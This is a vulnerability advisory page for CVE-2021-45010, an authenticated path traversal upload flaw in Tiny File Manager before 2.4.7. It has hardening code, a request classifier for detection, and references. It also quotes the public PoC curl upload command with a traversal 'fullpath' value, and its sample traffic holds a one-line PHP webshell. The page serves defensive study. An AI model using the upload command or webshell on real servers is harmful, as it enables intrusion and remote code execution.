CVE-2021-45010
Published 2022-03-15
Priority: P1 (79) · Severity: high · CVSS 3.1 base score 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public PoC available
EPSS: 70.08% (99.3rd percentile)
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.
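The description above in code, as an added illustration that is not the project's own PHP: vulnerable_target() models the unchecked join that lets a client-supplied 'fullpath' walk out of the upload directory into the webroot, and hardened_target() the containment plus extension-allowlist check a fix needs. WEBROOT, UPLOAD_DIR, ALLOWED_EXT and all function names are assumptions made for this example; the traversal string mirrors the '../../../../../../../..' prefix the public PoC sends.

```python
import posixpath

# Assumed deployment layout for the illustration; real paths depend on the install.
WEBROOT = "/var/www/html"
UPLOAD_DIR = "/var/www/html/files"
ALLOWED_EXT = frozenset({"txt", "pdf", "png", "jpg"})  # assumed allowlist, not the project's


def poc_fullpath(webroot, shell):
    """The 'fullpath' shape the public PoC sends: enough '..' segments to reach '/',
    then the leaked (or default) webroot and the shell filename."""
    return "../../../../../../../.." + webroot + "/" + shell


def vulnerable_target(upload_dir, fullpath):
    """Pre-2.4.7 behaviour as the description states it: the client-controlled
    'fullpath' is joined under the upload directory with no containment check,
    so '..' segments walk out of it (illustration, not the project's PHP)."""
    return posixpath.normpath(posixpath.join(upload_dir, fullpath))


def hardened_target(upload_dir, fullpath, allowed_ext=ALLOWED_EXT):
    """Resolve the target, then require it to stay inside upload_dir and to end in
    an allow-listed extension. Raises ValueError on either failure."""
    root = posixpath.normpath(upload_dir)
    target = posixpath.normpath(posixpath.join(root, fullpath))
    # An absolute 'fullpath' replaces root inside join(), so it fails this check too.
    if target != root and not target.startswith(root + "/"):
        raise ValueError(f"path escapes upload dir: {target}")
    name = posixpath.basename(target)
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in allowed_ext:
        raise ValueError(f"extension not allowed: {name}")
    return target


def is_accepted(upload_dir, fullpath):
    """True if hardened_target() would write the file, False if it rejects it."""
    try:
        hardened_target(upload_dir, fullpath)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    attack = poc_fullpath(WEBROOT, "shell1.php")
    print("vulnerable writes to:", vulnerable_target(UPLOAD_DIR, attack))
    print("hardened accepts attack:", is_accepted(UPLOAD_DIR, attack))
    print("hardened accepts report.pdf:", is_accepted(UPLOAD_DIR, "report.pdf"))
```

On a real filesystem resolve with os.path.realpath so symlinks cannot bypass the prefix comparison, and apply the check to the final name the server writes, not only to the field the client sent. A denylist of ".php" alone is not enough because typical PHP handler configurations also execute .phtml, .phar or .php5, which is why the allowlist form is the safe default.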
Affected
1 range (per the description: versions before 2.4.7)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prasathmani | tiny_file_manager | < 2.4.7 | 2.4.7 |
Detection & IOCs (extracted from sources)
PoC upload command (from the public exploit script; $URL, $cookie, $webroot and $shell are variables that script sets):

```bash
curl "$URL?p=" -X POST -s \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" \
  -b "$cookie" \
  -F "p=" \
  -F "fullpath=../../../../../../../..${webroot}/${shell}" \
  -F "file=@/tmp/$shell"
```
Detection ideas:
- Detect multipart POST requests to tinyfilemanager.php (or index.php) where the 'fullpath' field contains path traversal sequences (e.g. '../../') pointing outside the intended upload directory, especially targeting webroot paths.
- Alert on PHP file uploads via the Tiny File Manager upload endpoint (?p=&upload) where the uploaded filename ends in .php, indicative of webshell staging.
- Monitor for POST requests to the Tiny File Manager upload endpoint with a 'type=upload&uploadurl=<external URL>&ajax=true' body, used to trigger full path disclosure prior to exploitation.
- Detect newly created PHP files in the webroot with names matching the pattern 'shell[0-9]+.php', which the exploit drops as remote command execution webshells.
- Look for subsequent GET/POST requests to the dropped shell with a 'cmd=' query parameter or POST body, indicating active webshell interaction after upload.
- The exploit targets Tiny File Manager versions before 2.4.7 (demonstrated against 2.4.6); flag any internet-exposed instances of tinyfilemanager.php at these versions.

Caveats:
- Exploitation requires valid authenticated user credentials on the Tiny File Manager instance; unauthenticated attackers cannot directly exploit this vulnerability.
- The exploit first performs a full path disclosure step (via an intentionally invalid uploadurl) to determine the webroot before attempting the traversal upload; detections should cover both the recon and the upload phase.
- If the webroot cannot be leaked, the exploit falls back to the default path /var/www/html; detection rules should also cover traversal attempts targeting this default path.
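The detection notes above turned into runnable logic, as an added example that is not from the page's sources or the Tiny File Manager project: a classifier over proxy-style request records (method, URL, Content-Type, body) with a minimal multipart parser, run over constructed sample traffic that follows the PoC sequence of recon, traversal upload and webshell use. The endpoint names, form fields, default webroot and 'shell[0-9]+.php' pattern come from the notes; the record format, tag names, boundary string and sample bodies are assumptions for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Patterns drawn from the detection notes above.
TFM_ENDPOINT = re.compile(r"/(?:tinyfilemanager|index)\.php$")
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
SHELL_NAME = re.compile(r"^shell[0-9]+\.php$", re.IGNORECASE)
DEFAULT_WEBROOT = "/var/www/html"  # fallback the PoC uses when the webroot cannot be leaked

def build_multipart(boundary, fields):
    """Build a multipart/form-data body from (name, filename, value) triples; sample traffic only."""
    chunks = []
    for name, filename, value in fields:
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disposition += f'; filename="{filename}"'
        chunks.append(f"--{boundary}\r\n{disposition}\r\n\r\n{value}\r\n")
    chunks.append(f"--{boundary}--\r\n")
    return "".join(chunks)

def parse_multipart(content_type, body):
    """Minimal multipart/form-data parser: {field name: (filename or None, value)}.
    Enough for replaying logged requests; not a full RFC 7578 implementation."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    fields = {}
    for part in body.split("--" + match.group(1)):
        part = part.strip()
        if not part or part == "--":
            continue
        header, _, value = part.partition("\r\n\r\n")
        name = re.search(r'(?<!\w)name="([^"]*)"', header)  # skip 'filename='
        if not name:
            continue
        filename = re.search(r'filename="([^"]*)"', header)
        fields[name.group(1)] = (filename.group(1) if filename else None, value)
    return fields

def classify(req):
    """Return the alert tags that fire for one request record
    {"method", "url", "content_type", "body"} as a proxy or WAF would log it."""
    tags = []
    url = urlsplit(req["url"])
    query = parse_qs(url.query, keep_blank_values=True)
    content_type = req.get("content_type", "")
    body = req.get("body", "")
    if req["method"] == "POST" and TFM_ENDPOINT.search(url.path):
        if content_type.startswith("multipart/form-data"):
            fields = parse_multipart(content_type, body)
            # Decode %2e%2e-style encoding before looking for traversal.
            fullpath = unquote(fields.get("fullpath", (None, ""))[1])
            filename = fields.get("file", (None, ""))[0] or ""
            if TRAVERSAL.search(fullpath):
                tags.append("tfm_fullpath_traversal")
                if DEFAULT_WEBROOT in fullpath:
                    tags.append("tfm_default_webroot_target")
            # Covers both the ?p=&upload form and the bare ?p= form the PoC posts to.
            if filename.lower().endswith(".php") or fullpath.lower().endswith(".php"):
                tags.append("tfm_php_upload")
        elif content_type.startswith("application/x-www-form-urlencoded"):
            form = parse_qs(body, keep_blank_values=True)
            if form.get("type") == ["upload"] and form.get("uploadurl") and form.get("ajax") == ["true"]:
                tags.append("tfm_fpd_recon")
    # Post-upload interaction with a dropped shellN.php via cmd= in the query or body.
    if SHELL_NAME.match(url.path.rsplit("/", 1)[-1]):
        if "cmd" in query or "cmd" in parse_qs(body, keep_blank_values=True):
            tags.append("webshell_cmd")
    return tags

# Constructed sample traffic (not captured from a real incident) following the PoC sequence.
BOUNDARY = "----tfmexample"
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "/tinyfilemanager.php?p=",
     "content_type": "application/x-www-form-urlencoded",
     "body": "type=upload&uploadurl=http://127.0.0.1:1/nope&ajax=true"},
    {"method": "POST", "url": "/tinyfilemanager.php?p=&upload",
     "content_type": f"multipart/form-data; boundary={BOUNDARY}",
     "body": build_multipart(BOUNDARY, [
         ("p", None, ""),
         ("fullpath", None, "../../../../../../../../var/www/html/shell1.php"),
         ("file", "shell1.php", "<?php system($_REQUEST['cmd']); ?>")])},
    {"method": "POST", "url": "/tinyfilemanager.php?p=docs&upload",
     "content_type": f"multipart/form-data; boundary={BOUNDARY}",
     "body": build_multipart(BOUNDARY, [
         ("p", None, "docs"), ("fullpath", None, "report.pdf"),
         ("file", "report.pdf", "%PDF-1.4 ...")])},
    {"method": "GET", "url": "/shell1.php?cmd=id", "content_type": "", "body": ""},
    {"method": "GET", "url": "/index.php?p=", "content_type": "", "body": ""},
]

def scan(requests):
    """Return [(index, tags)] for every request that raised at least one tag."""
    tagged = [(i, classify(r)) for i, r in enumerate(requests)]
    return [(i, t) for i, t in tagged if t]
```

Run over SAMPLE_REQUESTS, scan() flags the recon POST, the traversal upload (which also hits the default-webroot and PHP-upload tags) and the cmd= request to shell1.php, and leaves the benign upload and page view alone. In practice the sequence matters as much as the individual tags: a tfm_fpd_recon followed shortly by tfm_fullpath_traversal from the same session is exactly the PoC's order of operations.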
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/166330/Tiny-File-Manager-2.4.6-Shell-Upload.html
- https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
- https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/raw/main/exploit.sh
- https://github.com/prasathmani/tinyfilemanager/commit/2046bbde72ed76af0cfdcae082de629bcc4b44c7
- https://github.com/prasathmani/tinyfilemanager/pull/636
- https://github.com/prasathmani/tinyfilemanager/pull/636/files/a93fc321a3c89fdb9bee860bf6df5d89083298d1
- https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.6-exploit/main/exploit.sh
- https://sploitus.com/exploit?id=1337DAY-ID-37364&utm_source=rss&utm_medium=rss